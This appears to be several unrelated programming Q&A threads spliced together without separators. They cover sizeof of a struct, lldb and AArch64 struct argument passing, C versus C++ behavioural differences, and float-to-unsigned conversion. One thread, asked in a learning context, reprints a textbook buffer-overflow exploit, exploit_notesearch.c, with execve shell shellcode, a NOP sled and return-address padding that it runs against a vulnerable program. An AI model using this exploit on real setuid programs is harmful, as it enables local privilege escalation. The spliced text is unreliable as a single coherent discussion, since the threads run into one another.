I know there is a mistake in my cod because I didn't allocate any memory. But I'm curious to know why sizeof(struct node) shows 16 in my computer although I haven't allocated memory yet.
`
#include <stdio.h>
#include <stdlib.h>
struct node
{
int data;
struct node *next;
};
int main(int argc, char const *argv[])
{
printf("%zu\n", sizeof(struct node));
return 0;
}
`
I thought a size zero would return but It didn't happend. Can you explain why sizeof(struct node) retuns 16?
You don't say if you're working in C or C++, but sizeof semantics are similar in this case, regardless.
https://en.cppreference.com/w/cpp/language/sizeof is a good place to start.
sizeof(type) returns the size in bytes of the object representation of type.
It tells you how much memory you will need to allocate for one of those things. The information (the size of the type) is known at compile time, so there's no reason you can't get it without actually allocating memory.
And in fact if you were to allocate memory with malloc:
myNode = malloc(sizeof (struct node))
In that line of code, sizeof(struct node) is being calculated before memory is allocated. It's calculated at compile time, so that the code generated is essentially malloc(16).
I've been focused on this book for several years trying to get through it slowly but truly by understanding all of the details. However, I've come to a roadblock with a specific line of code in the exploit_notesearch.c program source file. The for loop on line 24 reads, "for(i = 0; i < 160; i += 4)".
The entire program source code block is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset = 270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory.
strcpy(command, "./notesearch \'"); // Start command buffer.
buffer = command + strlen(command); // Set buffer at the end.
if (argc > 1) // Set offset.
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // Set return address.
for (i = 0; i < 160; i += 4) // Fill buffer with return address.
*((unsigned int *) (buffer + i)) = ret;
memset(buffer, 0x90, 60); // Build NOP sled.
memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);
strcat(command, "\'");
system(command); // Run exploit.
free(command);
}
What I'm not understanding with this line of code is the specific value chosen by the author of 160 (shown in bold above). Why is the value 160? Can someone please explain the logic to me?
Going through GDB I figured out that changing the value from 160 to a lower value kept the starting location the same for the NOP sled in the buffer. However, there were less bytes written to memory. With less written, the return address of the target may or may not be overwritten since if less bytes are overwritten when writing then the repeated return address may not reach the target return address. This depends on how much the value is lowered, if I understand correctly. However, this still confuses me, as from the comment itself, it states that the loop fills the buffer with the return address. To me, this makes it seem like the value 160 fills the entire buffer, but I'm just not sure. I do not understand the logic.
I even counted the length of the shellcode (35 bytes) and added that to the length of the initial command (15 bytes not including escape character) and coming to the value of 50, adding that to 160 to result in 210, it definitely doesn't make sense to me. (210 would be beyond the allocated heap size of 200)
I guess my main question is what is the relationship between the value 160 as it is used in the loop and the size of the buffer?
Secondly, is there any relationship between the value 160 and the 200 bytes allocated on the heap?
Lastly, why do we require two separate pointer variables used in exploit_notesearch.c? Specifically, a *command variable and *buffer variable? Couldn't we simply use one of them?
Any assistance is greatly appreciated.
In order to debug a macOS program I need to print the NSRect that is passed to -[NSView:setNeedsDisplayInRect:]. I can set a breakpoint in that method, but I have trouble printing its argument.
NSRect is “essentially” a struct of four doubles. In order to demonstrate the problem I have written a small self-contained program. It is compiled with Xcode 12.5 and run on a Mac mini with M1 processor.
#include <stdio.h>
typedef struct {
double a;
double b;
double c;
double d;
} MyRect1;
typedef struct {
double a;
double b;
double c;
long d;
} MyRect2;
void foo(MyRect1 rect) {
printf("%f\n", rect.a);
}
void bar(MyRect2 rect) {
printf("%f\n", rect.a);
}
int main(int argc, const char * argv[]) {
MyRect1 rect1 = { 1, 2, 3, 4 };
MyRect2 rect2 = { 1, 2, 3, 4 };
foo(rect1);
bar(rect2);
return 0;
}
The Procedure Call Standard for the ARM 64-bit Architecture (AArch64) states that
If the argument type is a Composite Type that is larger than 16 bytes, then the argument is copied to memory allocated by the caller and the argument is replaced by a pointer to the copy.
Therefore I would expect that both foo() and bar() are called with a pointer to the structure as the single argument. Setting a breakpoint in bar() and casting the first argument to MyRect2 * indeed produces the expected result:
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
* frame #0: 0x0000000100003e94 argtest2`bar(rect=(a = 1, b = 2, c = 3, d = 4)) at main.c:22:29
frame #1: 0x0000000100003f34 argtest2`main(argc=1, argv=0x000000016fdff428) at main.c:29:9
frame #2: 0x000000019871d430 libdyld.dylib`start + 4
(lldb) expr -- *(MyRect2 *)$arg1
(MyRect2) $0 = (a = 1, b = 2, c = 3, d = 4)
However, this does not work with MyRect1 in foo():
lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
* frame #0: 0x0000000100003e64 argtest2`foo(rect=(a = 1, b = 2, c = 3, d = 4)) at main.c:18:29
frame #1: 0x0000000100003f1c argtest2`main(argc=1, argv=0x000000016fdff428) at main.c:28:9
frame #2: 0x000000019871d430 libdyld.dylib`start + 4
(lldb) expr -- *(MyRect1 *)$arg1
error: Couldn't apply expression side effects : Couldn't dematerialize a result variable: couldn't read its memory
Note that both structs have the same size (32 bytes), and differ only in the last member.
Question: How can I print the argument passed to a function in lldb if that argument is of type NSRect (or any other struct of four doubles)?
Switching the double for the long in your structure was actually significant. A struct of four doubles is a Homogeneous Floating-point Aggregate, whereas the struct of three doubles and a long is a Composite Type, and they have different passing rules. The former is passed in the floating point registers if it fits (as you have found), whereas the latter is passed on the stack.
BTW, if you want to read the values passed into a function for which you don't have debug information, it's best to stop before the "function prologue" has been executed. The function prologue (especially in optimized code) will often copy registers from their original locations, and reuse them, so the register state after the prologue will no longer reflect the calling conventions.
However, debug information for functions is generally not accurate during the prologue. There's no technical reason why it can't be, but no compilers I know of track the prologue, and unless you are actually debugging the compiler output that region of code isn't terribly interesting. So for code with debug information it's more convenient to stop after the prologue is executed, and that's the lldb default.
To switch that default, add --skip-prologue 0 to your break set command.
C and C++ have many differences, and not all valid C code is valid C++ code.
(By "valid" I mean standard code with defined behavior, i.e. not implementation-specific/undefined/etc.)
Is there any scenario in which a piece of code valid in both C and C++ would produce different behavior when compiled with a standard compiler in each language?
To make it a reasonable/useful comparison (I'm trying to learn something practically useful, not to try to find obvious loopholes in the question), let's assume:
Nothing preprocessor-related (which means no hacks with #ifdef __cplusplus, pragmas, etc.)
Anything implementation-defined is the same in both languages (e.g. numeric limits, etc.)
We're comparing reasonably recent versions of each standard (e.g. say, C++98 and C90 or later)
If the versions matter, then please mention which versions of each produce different behavior.
Here is an example that takes advantage of the difference between function calls and object declarations in C and C++, as well as the fact that C90 allows the calling of undeclared functions:
#include <stdio.h>
struct f { int x; };
int main() {
f();
}
int f() {
return printf("hello");
}
In C++ this will print nothing because a temporary f is created and destroyed, but in C90 it will print hello because functions can be called without having been declared.
In case you were wondering about the name f being used twice, the C and C++ standards explicitly allow this, and to make an object you have to say struct f to disambiguate if you want the structure, or leave off struct if you want the function.
For C++ vs. C90, there's at least one way to get different behavior that's not implementation defined. C90 doesn't have single-line comments. With a little care, we can use that to create an expression with entirely different results in C90 and in C++.
int a = 10 //* comment */ 2
+ 3;
In C++, everything from the // to the end of the line is a comment, so this works out as:
int a = 10 + 3;
Since C90 doesn't have single-line comments, only the /* comment */ is a comment. The first / and the 2 are both parts of the initialization, so it comes out to:
int a = 10 / 2 + 3;
So, a correct C++ compiler will give 13, but a strictly correct C90 compiler 8. Of course, I just picked arbitrary numbers here -- you can use other numbers as you see fit.
The following, valid in C and C++, is going to (most likely) result in different values in i in C and C++:
int i = sizeof('a');
See Size of character ('a') in C/C++ for an explanation of the difference.
Another one from this article:
#include <stdio.h>
int sz = 80;
int main(void)
{
struct sz { char c; };
int val = sizeof(sz); // sizeof(int) in C,
// sizeof(struct sz) in C++
printf("%d\n", val);
return 0;
}
C90 vs. C++11 (int vs. double):
#include <stdio.h>
int main()
{
auto j = 1.5;
printf("%d", (int)sizeof(j));
return 0;
}
In C auto means local variable. In C90 it's ok to omit variable or function type. It defaults to int. In C++11 auto means something completely different, it tells the compiler to infer the type of the variable from the value used to initialize it.
Another example that I haven't seen mentioned yet, this one highlighting a preprocessor difference:
#include <stdio.h>
int main()
{
#if true
printf("true!\n");
#else
printf("false!\n");
#endif
return 0;
}
This prints "false" in C and "true" in C++ - In C, any undefined macro evaluates to 0. In C++, there's 1 exception: "true" evaluates to 1.
Per C++11 standard:
a. The comma operator performs lvalue-to-rvalue conversion in C but not C++:
char arr[100];
int s = sizeof(0, arr); // The comma operator is used.
In C++ the value of this expression will be 100 and in C this will be sizeof(char*).
b. In C++ the type of enumerator is its enum. In C the type of enumerator is int.
enum E { a, b, c };
sizeof(a) == sizeof(int); // In C
sizeof(a) == sizeof(E); // In C++
This means that sizeof(int) may not be equal to sizeof(E).
c. In C++ a function declared with empty params list takes no arguments. In C empty params list mean that the number and type of function params is unknown.
int f(); // int f(void) in C++
// int f(*unknown*) in C
This program prints 1 in C++ and 0 in C:
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
int d = (int)(abs(0.6) + 0.5);
printf("%d", d);
return 0;
}
This happens because there is double abs(double) overload in C++, so abs(0.6) returns 0.6 while in C it returns 0 because of implicit double-to-int conversion before invoking int abs(int). In C, you have to use fabs to work with double.
#include <stdio.h>
int main(void)
{
printf("%d\n", (int)sizeof('a'));
return 0;
}
In C, this prints whatever the value of sizeof(int) is on the current system, which is typically 4 in most systems commonly in use today.
In C++, this must print 1.
Another sizeof trap: boolean expressions.
#include <stdio.h>
int main() {
printf("%d\n", (int)sizeof !0);
}
It equals to sizeof(int) in C, because the expression is of type int, but is typically 1 in C++ (though it's not required to be). In practice they are almost always different.
An old chestnut that depends on the C compiler, not recognizing C++ end-of-line comments...
...
int a = 4 //* */ 2
+2;
printf("%i\n",a);
...
The C++ Programming Language (3rd Edition) gives three examples:
sizeof('a'), as #Adam Rosenfield mentioned;
// comments being used to create hidden code:
int f(int a, int b)
{
return a //* blah */ b
;
}
Structures etc. hiding stuff in out scopes, as in your example.
Another one listed by the C++ Standard:
#include <stdio.h>
int x[1];
int main(void) {
struct x { int a[2]; };
/* size of the array in C */
/* size of the struct in C++ */
printf("%d\n", (int)sizeof(x));
}
Inline functions in C default to external scope where as those in C++ do not.
Compiling the following two files together would print the "I am inline" in case of GNU C but nothing for C++.
File 1
#include <stdio.h>
struct fun{};
int main()
{
fun(); // In C, this calls the inline function from file 2 where as in C++
// this would create a variable of struct fun
return 0;
}
File 2
#include <stdio.h>
inline void fun(void)
{
printf("I am inline\n");
}
Also, C++ implicitly treats any const global as static unless it is explicitly declared extern, unlike C in which extern is the default.
#include <stdio.h>
struct A {
double a[32];
};
int main() {
struct B {
struct A {
short a, b;
} a;
};
printf("%d\n", sizeof(struct A));
return 0;
}
This program prints 128 (32 * sizeof(double)) when compiled using a C++ compiler and 4 when compiled using a C compiler.
This is because C does not have the notion of scope resolution. In C structures contained in other structures get put into the scope of the outer structure.
struct abort
{
int x;
};
int main()
{
abort();
return 0;
}
Returns with exit code of 0 in C++, or 3 in C.
This trick could probably be used to do something more interesting, but I couldn't think of a good way of creating a constructor that would be palatable to C. I tried making a similarly boring example with the copy constructor, that would let an argument be passed, albeit in a rather non-portable fashion:
struct exit
{
int x;
};
int main()
{
struct exit code;
code.x=1;
exit(code);
return 0;
}
VC++ 2005 refused to compile that in C++ mode, though, complaining about how "exit code" was redefined. (I think this is a compiler bug, unless I've suddenly forgotten how to program.) It exited with a process exit code of 1 when compiled as C though.
Don't forget the distinction between the C and C++ global namespaces. Suppose you have a foo.cpp
#include <cstdio>
void foo(int r)
{
printf("I am C++\n");
}
and a foo2.c
#include <stdio.h>
void foo(int r)
{
printf("I am C\n");
}
Now suppose you have a main.c and main.cpp which both look like this:
extern void foo(int);
int main(void)
{
foo(1);
return 0;
}
When compiled as C++, it will use the symbol in the C++ global namespace; in C it will use the C one:
$ diff main.cpp main.c
$ gcc -o test main.cpp foo.cpp foo2.c
$ ./test
I am C++
$ gcc -o test main.c foo.cpp foo2.c
$ ./test
I am C
int main(void) {
const int dim = 5;
int array[dim];
}
This is rather peculiar in that it is valid in C++ and in C99, C11, and C17 (though optional in C11, C17); but not valid in C89.
In C99+ it creates a variable-length array, which has its own peculiarities over normal arrays, as it has a runtime type instead of compile-time type, and sizeof array is not an integer constant expression in C. In C++ the type is wholly static.
If you try to add an initializer here:
int main(void) {
const int dim = 5;
int array[dim] = {0};
}
is valid C++ but not C, because variable-length arrays cannot have an initializer.
Empty structures have size 0 in C and 1 in C++:
#include <stdio.h>
typedef struct {} Foo;
int main()
{
printf("%zd\n", sizeof(Foo));
return 0;
}
This concerns lvalues and rvalues in C and C++.
In the C programming language, both the pre-increment and the post-increment operators return rvalues, not lvalues. This means that they cannot be on the left side of the = assignment operator. Both these statements will give a compiler error in C:
int a = 5;
a++ = 2; /* error: lvalue required as left operand of assignment */
++a = 2; /* error: lvalue required as left operand of assignment */
In C++ however, the pre-increment operator returns an lvalue, while the post-increment operator returns an rvalue. It means that an expression with the pre-increment operator can be placed on the left side of the = assignment operator!
int a = 5;
a++ = 2; // error: lvalue required as left operand of assignment
++a = 2; // No error: a gets assigned to 2!
Now why is this so? The post-increment increments the variable, and it returns the variable as it was before the increment happened. This is actually just an rvalue. The former value of the variable a is copied into a register as a temporary, and then a is incremented. But the former value of a is returned by the expression, it is an rvalue. It no longer represents the current content of the variable.
The pre-increment first increments the variable, and then it returns the variable as it became after the increment happened. In this case, we do not need to store the old value of the variable into a temporary register. We just retrieve the new value of the variable after it has been incremented. So the pre-increment returns an lvalue, it returns the variable a itself. We can use assign this lvalue to something else, it is like the following statement. This is an implicit conversion of lvalue into rvalue.
int x = a;
int x = ++a;
Since the pre-increment returns an lvalue, we can also assign something to it. The following two statements are identical. In the second assignment, first a is incremented, then its new value is overwritten with 2.
int a;
a = 2;
++a = 2; // Valid in C++.
The compiler I use is g++ (Ubuntu 4.8.4-2ubuntu1~14.04) 4.8.4.
I compile my programs with the following command:
g++ -std=c++11 -pedantic -Wall program.cpp
The program no. 1.:
#include <iostream>
using namespace std;
int main() {
unsigned int b;
b = -54;
cout << b << endl;
return 0;
}
The program prints 4294967242 and this is the value I expected, because this is the case when we assign an out-of-range value to a variable of unsigned type, so the result is the remainder of a modulo division.
The program no. 2.:
#include <iostream>
using namespace std;
int main() {
unsigned int b;
b = 54.1234;
cout << b << endl;
return 0;
}
The program prints 54, and this is also OK, because the stored value is the part before the decimal point, and the franctional part is truncated.
The program no. 3.:
#include <iostream>
using namespace std;
int main() {
unsigned int b;
b = -54.1234;
cout << b << endl;
return 0;
}
Here during compilation I get the warning "overflow in implicit constant conversion".
And the program prints 0. Why is it so? I thought that it will do the truncation of the fractional part (as in program 2) and then store the result of the modulo division (as in program 1).
But if I write program no. 4.:
program no. 4.
#include <iostream>
using namespace std;
int main() {
unsigned int b;
float k = -54.1234;
b = k;
cout << b << endl;
return 0;
}
then I get no warning, and I get the result (expected by me) 4294967242, which is the result of the modulo division.
I would be grateful if somebody can explain it to me.
Why doesn't the program no. 3 behave like program no. 4? Why don't I get a warning when compiling program no. 1, but I get one when compiling program no. 3.?
According to the standard (§[conv.fpint]).
A prvalue of a floating point type can be converted to a prvalue of an integer type. The conversion truncates; that is, the fractional part is discarded. The behavior is undefined if the truncated value cannot be represented in the destination type.
So, your -54.1234 is truncated to -54. Since that can't be represented in an unsigned, you get undefined behavior.
When converting floating point numbers to integers, C and C++ round floating point numbers towards zero. The rounded result must then be representable in the destination type.
As a result, for 32 bit unsigned int the conversion is guaranteed to give the correct result if -1 < x < 2^32. For smaller numbers there are no guarantees. Since numbers between -1 and 0 must be rounded to zero, and numbers -1 and smaller have no requirements, it wouldn't be surprising if the compiler checks whether x < 0 and gives a result of 0 in that case. (The compiler might check whether x < 1 and give a result of 0; this handles very small positive numbers as well).